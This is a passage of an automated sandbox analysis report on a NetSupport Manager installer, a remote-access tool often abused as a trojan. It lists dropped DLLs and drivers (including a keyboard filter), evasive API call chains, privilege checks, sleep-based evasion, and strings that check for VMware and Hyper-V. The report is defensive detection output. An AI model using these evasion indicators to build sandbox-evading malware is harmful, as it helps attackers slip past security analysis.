                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeDropped PE file which has not been started: C:\Windows\System32\drivers\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF710.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEA2C.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF869.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEBEA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF2D5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXEJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2955.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF8D7.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEB3B.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE94E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEEB5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIECC9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEE06.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE66A.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEA5C.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF917.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEAFB.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIED48.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI37C0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEC1A.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF149.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sysJump to dropped file
                                Source: C:\Windows\Installer\MSI1387.tmpDropped PE file which has not been started: C:\Windows\SysWOW64\pcimsg.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEF23.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF10A.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3771.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEACC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIED87.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE787.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEE85.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEC59.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF1F8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1DBA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE708.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI23B6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEC89.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF238.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF1A9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exeJump to dropped file
                                Source: C:\Windows\Installer\MSI1387.tmpEvaded block: after key decision
                                Source: C:\Windows\Installer\MSI1387.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Windows\Installer\MSIF985.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Windows\Installer\MSIF373.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_25-60135
                                Source: C:\Windows\Installer\MSIF985.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                Source: C:\Windows\Installer\MSI1387.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                Source: C:\Windows\Installer\MSIF373.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_25-60075
                                Source: C:\Windows\Installer\MSIF373.tmpAPI coverage: 3.2 %
                                Source: C:\Windows\Installer\MSIF985.tmpAPI coverage: 3.2 %
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeAPI coverage: 5.9 %
                                Source: C:\Windows\Installer\MSI1387.tmpAPI coverage: 9.3 %
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 5728Thread sleep count: 3206 > 30
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 5728Thread sleep time: -128240s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 5728Thread sleep count: 6040 > 30
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 5728Thread sleep time: -241600s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 5224Thread sleep time: -41800s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 7508Thread sleep time: -37400s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe TID: 7508Thread sleep time: -524000s >= -30000s
                                Source: C:\Windows\System32\svchost.exe TID: 4336Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeThread sleep count: Count: 3206 delay: -40
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeThread sleep count: Count: 6040 delay: -40
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeThread sleep count: Count: 1045 delay: -40
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,25_2_005D80C0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D4AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,25_2_005D4AF0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005C0C40 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,25_2_005C0C40
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D55D0 FindFirstFileW,FindClose,25_2_005D55D0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005BFD80 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,25_2_005BFD80
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DBE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,25_2_005DBE60
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005BFE18 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,25_2_005BFE18
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009180C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,27_2_009180C0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00914AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,27_2_00914AF0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_00900C40 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,27_2_00900C40
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009155D0 FindFirstFileW,FindClose,27_2_009155D0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008FFD80 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,27_2_008FFD80
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_008FFE18 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,27_2_008FFE18
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0091BE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,27_2_0091BE60
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FD0C40 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,29_2_00FD0C40
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,29_2_00FE80C0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE4AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,29_2_00FE4AF0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE55D0 FindFirstFileW,FindClose,29_2_00FE55D0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FCFD80 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,29_2_00FCFD80
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FEBE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,29_2_00FEBE60
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FCFE18 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,29_2_00FCFE18
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005CA860 GetVersionExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetSystemInfo,GetModuleHandleW,GetProcAddress,GetSystemMetrics,wsprintfW,25_2_005CA860
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: VMware
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 000000000002004C4F4F50%02X%02X%02X%02X%02X%02XVirtualVMwareVIRTNETGetAdapt8BC
                                Source: client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: DoApplicationList type %d, found %d windows, max size %dWSAIoctlws2_32.dllGetAdaptersAddressesHyper-VVMWarevirt0000000000%02X%02X%02X%02X%02X%02XBluetoothpfn..\CTL32\tcctlex.cppRtlIpv6AddressToStringWntohl..\CTL32\tcputil.cpntohlpGetHostByNamegethostbynamepGetHostNamegethostnamepWSACleanuppWSAStartupWSOCK32.DLLSendARPSnmpExtensionQuerySnmpExtensionInitINETMIB1.DLLSnmpUtilVarBindFreeSnmpUtilOidNCmpSnmpUtilOidCpysnmpapi.dlll
                                Source: client32.exe, 00000021.00000002.115176701992.0000000000CE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                                Source: client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: vmware
                                Source: client32.exe, 00000020.00000002.115177447611.0000000000989000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                                Source: client32.exe, 00000020.00000002.115186233551.000000006C977000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: >localhost:%d%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesHyper-VvirtualVMWarevirt0000000000%02X%02X%02X%02X%02X%02XBluetoothpfntcctlex.cppRtlIpv6AddressToStringWntdll.dllntohlTCREMOTETCBRIDGE%s=%s
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: DoApplicationList type %d, found %d windows, max size %dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLGetAdaptersAddressesvirtualVMWarevirtpfntcctlex.cppRtlIpv6AddressToStringWntohlresultpGetAdaptersInfotcputil.cpntohlpGetHostByNamegethostbynamepGetHostNamegethostnamepWSACleanuppWSAStartupWSOCK32.DLLSnmpExtensionQuerySnmpExtensionInitINETMIB1.DLLSnmpUtilVarBindFreeSnmpUtilOidNCmpSnmpUtilOidCpysnmpapi.dll
